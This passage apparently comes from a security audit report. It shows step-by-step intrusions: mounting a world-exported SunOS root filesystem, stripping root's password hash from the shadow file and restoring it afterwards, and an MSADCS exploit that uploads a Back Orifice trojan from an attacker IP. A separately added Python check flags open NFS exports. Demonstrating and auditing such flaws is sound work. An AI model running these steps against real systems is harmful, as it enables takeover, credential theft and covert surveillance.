Sample Intrusion Methodologies
First we examine host FOO, a UNIX machine running SUNOS 5.4. Text in bold represents hacker input; text in italic represents target responses; text in { } is explanatory commentary.
From the local Linux prompt:
# showmount -e foo
Export list for foo:
filesystem    restrictions
/             everyone
/usr          everyone
/usr/local    everyone
/var          everyone
/disk3        everyone
{The root filesystem is being exported to Everyone; on the Internet this really does mean EVERYONE}
# mkdir /foo {create a local mount point}
# mount foo:/ /foo {mount the root filesystem on foo to a local directory}
# cd /foo/etc {we now have direct access to foo's system files}
# cp shadow /
# cp passwd / {copy foo's password files to our local machine for cracking; this is not required as we already have complete access to foo, but some of the passwords may exist on other machines on the remote network}
# cp shadow shad.backup {make a backup of the remote password file}
# vi shadow {open the shadowed password file with a standard editor and remove the password hash for root}
# telnet foo
Foo - SUNOS 5.4
login: root {login to foo as root}
Welcome to foo. {no password required; the hacker is now free to install whatever backdoors/trojans/rootkits he desires and has full administrative access to this machine}
# logout {logout of foo}
# rm /foo/etc/shadow {delete compromised password file}
# cp /foo/etc/shad.backup /foo/etc/shadow {restore genuine password file}
# umount /foo {unmount remote filesystem, game over.........}
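A defender-side check for the misconfiguration shown above, added here as an example and not part of the original report: it parses showmount -e output in the layout printed by foo and flags every filesystem exported with no client restriction, rating an exported root or /etc as critical. The sample output is constructed from the listing above; the "(everyone)" and "*" spellings are assumed forms that other NFS servers print for the same thing.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: foo's export list from the page, one export per line.
SAMPLE_SHOWMOUNT = """\
Export list for foo:
filesystem restrictions
/ everyone
/usr everyone
/usr/local everyone
/var everyone
/disk3 everyone
"""

# Tokens meaning "no client restriction". "everyone" is what foo printed;
# "(everyone)" and "*" are assumed equivalents from other NFS servers.
WORLD_TOKENS = {"everyone", "(everyone)", "*"}

# Exporting these hands over the system files (e.g. /etc/shadow) directly.
CRITICAL_PATHS = {"/", "/etc"}


def parse_showmount(text: str) -> Dict[str, List[str]]:
    """Return {export_path: [client restrictions]} from showmount -e output."""
    exports: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("/"):
            continue  # skip the "Export list for" banner and the column header
        path, _, rest = line.partition(" ")
        # Restrictions may be comma- or space-separated depending on the server.
        clients = [c for c in re.split(r"[,\s]+", rest.strip()) if c]
        exports[path] = clients
    return exports


def world_exports(exports: Dict[str, List[str]]) -> List[Tuple[str, str]]:
    """List (path, severity) for every export any host on the network may mount.

    An export with no restriction column at all is treated as world-mountable,
    since nothing in the listing proves otherwise.
    """
    findings = []
    for path, clients in exports.items():
        if not clients or any(c.lower() in WORLD_TOKENS for c in clients):
            severity = "critical" if path in CRITICAL_PATHS else "high"
            findings.append((path, severity))
    return findings


if __name__ == "__main__":
    for path, severity in world_exports(parse_showmount(SAMPLE_SHOWMOUNT)):
        print(f"{severity.upper():8} {path} is mountable by any host")
```

Run it against the real output of showmount -e on each NFS server in the audited range; any line it prints should be fixed by restricting the export to named hosts or netgroups, and the root filesystem should not be exported at all.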
Next we examine the NT host, BAR. There is a serious vulnerability on this host, referenced in the report as MSADCS.DLL, which allows a hacker to execute remote commands and upload files to this system. Our plan is to upload and execute a remote access trojan (Back Orifice 2000), giving us complete and unrestricted access to the target filesystem as well as the ability to capture keystrokes, monitor user input and hijack the keyboard and mouse. The trojan will be called monitor.exe and will be Windows executable code, though the exploit will be carried out from a Linux machine. This exploit uses the easily acquirable hacker programs msadc-trojan.pl and msadc2.pl, both of which are written in perl. The source is included in the appendices.
From the Linux prompt:
# echo "+ +" > .rhosts {slight modification to local system config}
# ./msadc-trojan.pl bar 12.34.12.34 monitor.exe {upload and execute trojan using remote and local IPs}
Now all that is required is to connect to the remote trojan using the BO2K client. A trivial exploit, but it allows complete access; once again, game over.........